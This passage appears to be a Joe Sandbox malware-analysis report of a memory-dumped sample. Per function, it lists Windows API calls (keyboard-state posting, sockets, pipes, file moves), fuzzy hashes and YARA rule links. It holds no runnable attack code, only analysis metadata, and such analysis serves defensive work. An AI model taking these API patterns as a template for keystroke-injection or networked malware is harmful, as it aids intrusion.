                                                        • Opcode Fuzzy Hash: e0ffa8de45011af9abf04345b16c9b3564893d1c1255aa7ed7db3bfe0381460b
                                                        • Instruction Fuzzy Hash: 0491F6B1D0021D9FDF14DFA4C891AEEB7B9FF08314F108569E919BB291DB709A458F60
                                                        Function 00E820FD Relevance: 10.7, APIs: 7, Instructions: 196windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetMenu.USER32(?), ref: 00E82183
                                                        • GetMenuItemCount.USER32(00000000), ref: 00E821B5
                                                        • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 00E821DD
                                                        • _wcslen.LIBCMT ref: 00E82213
                                                        • GetMenuItemID.USER32(?,?), ref: 00E8224D
                                                        • GetSubMenu.USER32(?,?), ref: 00E8225B
                                                          • Part of subcall function 00E53A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00E53A57
                                                          • Part of subcall function 00E53A3D: GetCurrentThreadId.KERNEL32 ref: 00E53A5E
                                                          • Part of subcall function 00E53A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,00E525B3), ref: 00E53A65
                                                        • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00E822E3
                                                          • Part of subcall function 00E5E97B: Sleep.KERNELBASE ref: 00E5E9F3
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.3760140802.0000000000DF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DF0000, based on PE: true
                                                        • Associated: 00000011.00000002.3759839747.0000000000DF0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000E8C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000EB2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3765847886.0000000000EBC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3766084695.0000000000EC4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_df0000_6dbb7bdf47.jbxd
                                                        Similarity
                                                        • API ID: Menu$Thread$Item$AttachCountCurrentInputMessagePostProcessSleepStringWindow_wcslen
                                                        • String ID:
                                                        • API String ID: 4196846111-0
                                                        • Opcode ID: 0c25c62f0e73e9345a7d58a096b97302e84f5efd23359b9c36f733afc0d1ab59
                                                        • Instruction ID: 021b511984788b43a8776363037e160f6fa99e479889fa77aea04da69afd66e8
                                                        • Opcode Fuzzy Hash: 0c25c62f0e73e9345a7d58a096b97302e84f5efd23359b9c36f733afc0d1ab59
                                                        • Instruction Fuzzy Hash: 7A718E75A00205AFCB10EF64C845AAEB7F5EF88314F109469EA1EFB351D734AD418BA0
                                                        Function 00E5AEBA Relevance: 10.7, APIs: 7, Instructions: 162windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetParent.USER32(?), ref: 00E5AEF9
                                                        • GetKeyboardState.USER32(?), ref: 00E5AF0E
                                                        • SetKeyboardState.USER32(?), ref: 00E5AF6F
                                                        • PostMessageW.USER32(?,00000101,00000010,?), ref: 00E5AF9D
                                                        • PostMessageW.USER32(?,00000101,00000011,?), ref: 00E5AFBC
                                                        • PostMessageW.USER32(?,00000101,00000012,?), ref: 00E5AFFD
                                                        • PostMessageW.USER32(?,00000101,0000005B,?), ref: 00E5B020
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.3760140802.0000000000DF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DF0000, based on PE: true
                                                        • Associated: 00000011.00000002.3759839747.0000000000DF0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000E8C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000EB2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3765847886.0000000000EBC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3766084695.0000000000EC4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_df0000_6dbb7bdf47.jbxd
                                                        Similarity
                                                        • API ID: MessagePost$KeyboardState$Parent
                                                        • String ID:
                                                        • API String ID: 87235514-0
                                                        • Opcode ID: 1493b33c212db7d981dff3d6d47972b68cdc4b194190d5762a2abbc0fd967433
                                                        • Instruction ID: c73ffab6c516a4ab9a13908b873e1337f438b5de926a5c190490bb0957efd3d7
                                                        • Opcode Fuzzy Hash: 1493b33c212db7d981dff3d6d47972b68cdc4b194190d5762a2abbc0fd967433
                                                        • Instruction Fuzzy Hash: B95103A06043D13DFB324234CC05BBABEE95B06309F0C9999E9D9654C2D3E8ACCCD361
                                                        Function 00E5ACDA Relevance: 10.7, APIs: 7, Instructions: 161windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetParent.USER32(00000000), ref: 00E5AD19
                                                        • GetKeyboardState.USER32(?), ref: 00E5AD2E
                                                        • SetKeyboardState.USER32(?), ref: 00E5AD8F
                                                        • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00E5ADBB
                                                        • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00E5ADD8
                                                        • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00E5AE17
                                                        • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00E5AE38
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.3760140802.0000000000DF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DF0000, based on PE: true
                                                        • Associated: 00000011.00000002.3759839747.0000000000DF0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000E8C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000EB2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3765847886.0000000000EBC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3766084695.0000000000EC4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_df0000_6dbb7bdf47.jbxd
                                                        Similarity
                                                        • API ID: MessagePost$KeyboardState$Parent
                                                        • String ID:
                                                        • API String ID: 87235514-0
                                                        • Opcode ID: aa55902ce159e3becb6a8485db822ab0e3f0da941d9eb796dbed406bce7d4523
                                                        • Instruction ID: f95702279829724cd9899ae9cadcb64e9226c2a7868a294b5763003ef916fc11
                                                        • Opcode Fuzzy Hash: aa55902ce159e3becb6a8485db822ab0e3f0da941d9eb796dbed406bce7d4523
                                                        • Instruction Fuzzy Hash: 485127A15047D53DFB3253348C46B7ABEE86B0630AF0C9E98E5D5668C2D694ECCCD362
                                                        Function 00E2542E Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        • GetConsoleCP.KERNEL32(00E33CD6,?,?,?,?,?,?,?,?,00E25BA3,?,?,00E33CD6,?,?), ref: 00E25470
                                                        • __fassign.LIBCMT ref: 00E254EB
                                                        • __fassign.LIBCMT ref: 00E25506
                                                        • WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,00E33CD6,00000005,00000000,00000000), ref: 00E2552C
                                                        • WriteFile.KERNEL32(?,00E33CD6,00000000,00E25BA3,00000000,?,?,?,?,?,?,?,?,?,00E25BA3,?), ref: 00E2554B
                                                        • WriteFile.KERNEL32(?,?,00000001,00E25BA3,00000000,?,?,?,?,?,?,?,?,?,00E25BA3,?), ref: 00E25584
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.3760140802.0000000000DF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DF0000, based on PE: true
                                                        • Associated: 00000011.00000002.3759839747.0000000000DF0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000E8C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000EB2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3765847886.0000000000EBC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3766084695.0000000000EC4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_df0000_6dbb7bdf47.jbxd
                                                        Similarity
                                                        • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                        • String ID:
                                                        • API String ID: 1324828854-0
                                                        • Opcode ID: 0bb4f8f46b4be80e3de1aadcb503bed41500ea8a752498103c72bddb4c5d5d5f
                                                        • Instruction ID: 28a60d7be3b9c9aa70c0f5ac1e08a7d00f855d543fe4e55d32571dff922715ca
                                                        • Opcode Fuzzy Hash: 0bb4f8f46b4be80e3de1aadcb503bed41500ea8a752498103c72bddb4c5d5d5f
                                                        • Instruction Fuzzy Hash: CF51E371A006589FDB10CFA8E985AEEBBF9EF09301F14511AF555F7291D7309A41CF60
                                                        Function 00E710B8 Relevance: 10.6, APIs: 7, Instructions: 110networkCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 00E7304E: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 00E7307A
                                                          • Part of subcall function 00E7304E: _wcslen.LIBCMT ref: 00E7309B
                                                        • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 00E71112
                                                        • WSAGetLastError.WSOCK32 ref: 00E71121
                                                        • WSAGetLastError.WSOCK32 ref: 00E711C9
                                                        • closesocket.WSOCK32(00000000), ref: 00E711F9
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.3760140802.0000000000DF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DF0000, based on PE: true
                                                        • Associated: 00000011.00000002.3759839747.0000000000DF0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000E8C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000EB2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3765847886.0000000000EBC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3766084695.0000000000EC4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_df0000_6dbb7bdf47.jbxd
                                                        Similarity
                                                        • API ID: ErrorLast$_wcslenclosesocketinet_addrsocket
                                                        • String ID:
                                                        • API String ID: 2675159561-0
                                                        • Opcode ID: 4ebecb3281d6421b9caa2b8269a3a712eb5a0c7dc64c09e54fa246431e3e8bd0
                                                        • Instruction ID: 63bc71dd93bf1cfa942721ab13f3ccb06243d7380d4e7ee246a7567faa836077
                                                        • Opcode Fuzzy Hash: 4ebecb3281d6421b9caa2b8269a3a712eb5a0c7dc64c09e54fa246431e3e8bd0
                                                        • Instruction Fuzzy Hash: FF41F431601618AFDB109F68C884BA9B7E9EF45328F54C099FD09AF291C770AD45CBB0
                                                        Function 00E5CF00 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 108filestringCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 00E5DDE0: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00E5CF22,?), ref: 00E5DDFD
                                                          • Part of subcall function 00E5DDE0: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00E5CF22,?), ref: 00E5DE16
                                                        • lstrcmpiW.KERNEL32(?,?), ref: 00E5CF45
                                                        • MoveFileW.KERNEL32(?,?), ref: 00E5CF7F
                                                        • _wcslen.LIBCMT ref: 00E5D005
                                                        • _wcslen.LIBCMT ref: 00E5D01B
                                                        • SHFileOperationW.SHELL32(?), ref: 00E5D061
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.3760140802.0000000000DF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DF0000, based on PE: true
                                                        • Associated: 00000011.00000002.3759839747.0000000000DF0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000E8C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000EB2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3765847886.0000000000EBC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3766084695.0000000000EC4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_df0000_6dbb7bdf47.jbxd
                                                        Similarity
                                                        • API ID: FileFullNamePath_wcslen$MoveOperationlstrcmpi
                                                        • String ID: \*.*
                                                        • API String ID: 3164238972-1173974218
                                                        • Opcode ID: 65a986735f42c77e5ce6c5da603ce75efb6263bc3cdb06d50bb479d727b977d7
                                                        • Instruction ID: 212e3d229de4498b2688da58a5c1d7d2c2f07d0c21a17b95e96c3eb40c403bcf
                                                        • Opcode Fuzzy Hash: 65a986735f42c77e5ce6c5da603ce75efb6263bc3cdb06d50bb479d727b977d7
                                                        • Instruction Fuzzy Hash: 534155719052185FDF12EBA4DD91ADEB7F9AF08381F1014E6E505FB141EA34A78CCB60
                                                        Function 00E82DFD Relevance: 10.6, APIs: 7, Instructions: 99windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 00E82E1C
                                                        • GetWindowLongW.USER32(?,000000F0), ref: 00E82E4F
                                                        • GetWindowLongW.USER32(?,000000F0), ref: 00E82E84
                                                        • SendMessageW.USER32(?,000000F1,00000000,00000000), ref: 00E82EB6
                                                        • SendMessageW.USER32(?,000000F1,00000001,00000000), ref: 00E82EE0
                                                        • GetWindowLongW.USER32(?,000000F0), ref: 00E82EF1
                                                        • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00E82F0B
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.3760140802.0000000000DF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DF0000, based on PE: true
                                                        • Associated: 00000011.00000002.3759839747.0000000000DF0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000E8C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000EB2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3765847886.0000000000EBC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3766084695.0000000000EC4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_df0000_6dbb7bdf47.jbxd
                                                        Similarity
                                                        • API ID: LongWindow$MessageSend
                                                        • String ID:
                                                        • API String ID: 2178440468-0
                                                        • Opcode ID: 726e175931359c335bfeab94fc2e19ee528a7d3f42e467ff817a953f5a05b0c0
                                                        • Instruction ID: c93627373ea68cfbf6c5c4a75003185789cb591a010f7120dadae50a51eb423f
                                                        • Opcode Fuzzy Hash: 726e175931359c335bfeab94fc2e19ee528a7d3f42e467ff817a953f5a05b0c0
                                                        • Instruction Fuzzy Hash: 343126306041409FDB22DF19DC84F6537E0FB8AB14F1411A9FA0CAF2B2CB71A844DB16
                                                        Function 00E57726 Relevance: 10.6, APIs: 7, Instructions: 94memoryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00E57769
                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00E5778F
                                                        • SysAllocString.OLEAUT32(00000000), ref: 00E57792
                                                        • SysAllocString.OLEAUT32(?), ref: 00E577B0
                                                        • SysFreeString.OLEAUT32(?), ref: 00E577B9
                                                        • StringFromGUID2.OLE32(?,?,00000028), ref: 00E577DE
                                                        • SysAllocString.OLEAUT32(?), ref: 00E577EC
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.3760140802.0000000000DF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DF0000, based on PE: true
                                                        • Associated: 00000011.00000002.3759839747.0000000000DF0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000E8C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000EB2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3765847886.0000000000EBC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3766084695.0000000000EC4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_df0000_6dbb7bdf47.jbxd
                                                        Similarity
                                                        • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                        • String ID:
                                                        • API String ID: 3761583154-0
                                                        • Opcode ID: c630ea58ef475240901bf9c6223a690e3032824e6219382b04e13f14c59b431b
                                                        • Instruction ID: 428bf9707d6830694cc3ea03b68c59cbffaa03ab2a403ec9515349739028435a
                                                        • Opcode Fuzzy Hash: c630ea58ef475240901bf9c6223a690e3032824e6219382b04e13f14c59b431b
                                                        • Instruction Fuzzy Hash: 3C21B276604219AFDB10DFA9EC88CBB73ACEB093657108426FE54EB190D670DC89C770
                                                        Function 00E577FD Relevance: 10.6, APIs: 7, Instructions: 89memoryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00E57842
                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00E57868
                                                        • SysAllocString.OLEAUT32(00000000), ref: 00E5786B
                                                        • SysAllocString.OLEAUT32 ref: 00E5788C
                                                        • SysFreeString.OLEAUT32 ref: 00E57895
                                                        • StringFromGUID2.OLE32(?,?,00000028), ref: 00E578AF
                                                        • SysAllocString.OLEAUT32(?), ref: 00E578BD
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.3760140802.0000000000DF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DF0000, based on PE: true
                                                        • Associated: 00000011.00000002.3759839747.0000000000DF0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000E8C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000EB2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3765847886.0000000000EBC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3766084695.0000000000EC4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_df0000_6dbb7bdf47.jbxd
                                                        Similarity
                                                        • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                        • String ID:
                                                        • API String ID: 3761583154-0
                                                        • Opcode ID: 51422473f52eba046e01e946404569822a6de452df142c03b4f3b02ac23f84bd
                                                        • Instruction ID: e571a432c9675d3b0f62d54b6de7985245c0ea2e0459ba87213acf2239e00eef
                                                        • Opcode Fuzzy Hash: 51422473f52eba046e01e946404569822a6de452df142c03b4f3b02ac23f84bd
                                                        • Instruction Fuzzy Hash: DD21D631604124AFDB149FB9EC8CDBA77ECEB093607108425F954EB2A1D670DC89CB74
                                                        Function 00E604D2 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 80pipeCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetStdHandle.KERNEL32(0000000C), ref: 00E604F2
                                                        • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00E6052E
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.3760140802.0000000000DF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DF0000, based on PE: true
                                                        • Associated: 00000011.00000002.3759839747.0000000000DF0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000E8C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000EB2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3765847886.0000000000EBC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3766084695.0000000000EC4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_df0000_6dbb7bdf47.jbxd
                                                        Similarity
                                                        • API ID: CreateHandlePipe
                                                        • String ID: nul
                                                        • API String ID: 1424370930-2873401336
                                                        • Opcode ID: 406013e7c68de2520f624f332215ef13159a48f41d3052d54f136155a45904ee
                                                        • Instruction ID: f1261884c5947dc7d36bb89e8a4a540dc71d21e0ecfabde72eb582b2ac8bc6fd
                                                        • Opcode Fuzzy Hash: 406013e7c68de2520f624f332215ef13159a48f41d3052d54f136155a45904ee
                                                        • Instruction Fuzzy Hash: 8D216D75540315AFDB309F29EC44A9B7BF4AF457A8F204A19F8A6F62E0E7709944CF20
                                                        Function 00E605A7 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 80pipeCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetStdHandle.KERNEL32(000000F6), ref: 00E605C6
                                                        • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00E60601
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.3760140802.0000000000DF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DF0000, based on PE: true
                                                        • Associated: 00000011.00000002.3759839747.0000000000DF0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000E8C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000EB2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3765847886.0000000000EBC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3766084695.0000000000EC4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_df0000_6dbb7bdf47.jbxd
                                                        Similarity
                                                        • API ID: CreateHandlePipe
                                                        • String ID: nul
                                                        • API String ID: 1424370930-2873401336
                                                        • Opcode ID: 802310fd0dfffe9d6698a6d585619d1b249d03679d9bc589924bda79ae41552c
                                                        • Instruction ID: 60065c5ebdeb3d4339480db64d37c5b767a8f02df588c04e570bc71f9c0fe03b
                                                        • Opcode Fuzzy Hash: 802310fd0dfffe9d6698a6d585619d1b249d03679d9bc589924bda79ae41552c
                                                        • Instruction Fuzzy Hash: 9B2183755803259FDB209F69EC44A9F77E4AF95764F201A19F8A1F72E0D7709860CB20
                                                        Function 00E840AD Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 00DF600E: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00DF604C
                                                          • Part of subcall function 00DF600E: GetStockObject.GDI32(00000011), ref: 00DF6060
                                                          • Part of subcall function 00DF600E: SendMessageW.USER32(00000000,00000030,00000000), ref: 00DF606A
                                                        • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00E84112
                                                        • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 00E8411F
                                                        • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00E8412A
                                                        • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00E84139
                                                        • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00E84145
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.3760140802.0000000000DF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DF0000, based on PE: true
                                                        • Associated: 00000011.00000002.3759839747.0000000000DF0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000E8C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000EB2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3765847886.0000000000EBC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3766084695.0000000000EC4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_df0000_6dbb7bdf47.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$CreateObjectStockWindow
                                                        • String ID: Msctls_Progress32
                                                        • API String ID: 1025951953-3636473452
                                                        • Opcode ID: 21a738f70b5d5710587dc7505c6a3536c8cc48eba7c66ccb58ae39dfef058e31
                                                        • Instruction ID: a27b40ed1853c437317103426554c9f050b59f87d5bda1988ba9e9f4f1b859f8
                                                        • Opcode Fuzzy Hash: 21a738f70b5d5710587dc7505c6a3536c8cc48eba7c66ccb58ae39dfef058e31
                                                        • Instruction Fuzzy Hash: 5C1190B215021ABEEF119FA4CC85EE77F9DEF09798F115110BA18A2090CA72DC219BA4
                                                        Function 00E2D7DF Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 00E2D7A3: _free.LIBCMT ref: 00E2D7CC
                                                        • _free.LIBCMT ref: 00E2D82D
                                                          • Part of subcall function 00E229C8: RtlFreeHeap.NTDLL(00000000,00000000,?,00E2D7D1,00000000,00000000,00000000,00000000,?,00E2D7F8,00000000,00000007,00000000,?,00E2DBF5,00000000), ref: 00E229DE
                                                          • Part of subcall function 00E229C8: GetLastError.KERNEL32(00000000,?,00E2D7D1,00000000,00000000,00000000,00000000,?,00E2D7F8,00000000,00000007,00000000,?,00E2DBF5,00000000,00000000), ref: 00E229F0
                                                        • _free.LIBCMT ref: 00E2D838
                                                        • _free.LIBCMT ref: 00E2D843
                                                        • _free.LIBCMT ref: 00E2D897
                                                        • _free.LIBCMT ref: 00E2D8A2
                                                        • _free.LIBCMT ref: 00E2D8AD
                                                        • _free.LIBCMT ref: 00E2D8B8
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.3760140802.0000000000DF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DF0000, based on PE: true
                                                        • Associated: 00000011.00000002.3759839747.0000000000DF0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000E8C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000EB2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3765847886.0000000000EBC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3766084695.0000000000EC4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_df0000_6dbb7bdf47.jbxd
                                                        Similarity
                                                        • API ID: _free$ErrorFreeHeapLast
                                                        • String ID:
                                                        • API String ID: 776569668-0
                                                        • Opcode ID: d5e9bbcb1dbdafe4c8d3bd98f36014f41f46dc5d4a3df644b036f3c2391e0fc8
                                                        • Instruction ID: d9346a2d23cf3bc1de36a82560f473bf84e9561ce6746358b4a5881ca31b229f
                                                        • Opcode Fuzzy Hash: d5e9bbcb1dbdafe4c8d3bd98f36014f41f46dc5d4a3df644b036f3c2391e0fc8
                                                        • Instruction Fuzzy Hash: CC115E71544B24BAD621BFB0EC47FCB7BDCAF44700F80182AB3D9B6092DA69B5458760
                                                        Function 00E5DA5A Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 46windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00E5DA74
                                                        • LoadStringW.USER32(00000000), ref: 00E5DA7B
                                                        • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00E5DA91
                                                        • LoadStringW.USER32(00000000), ref: 00E5DA98
                                                        • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00E5DADC
                                                        Strings
                                                        • %s (%d) : ==> %s: %s %s, xrefs: 00E5DAB9
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.3760140802.0000000000DF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DF0000, based on PE: true
                                                        • Associated: 00000011.00000002.3759839747.0000000000DF0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000E8C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000EB2000.00000002.00000001.01000000.0000000B.sdmpDownload File
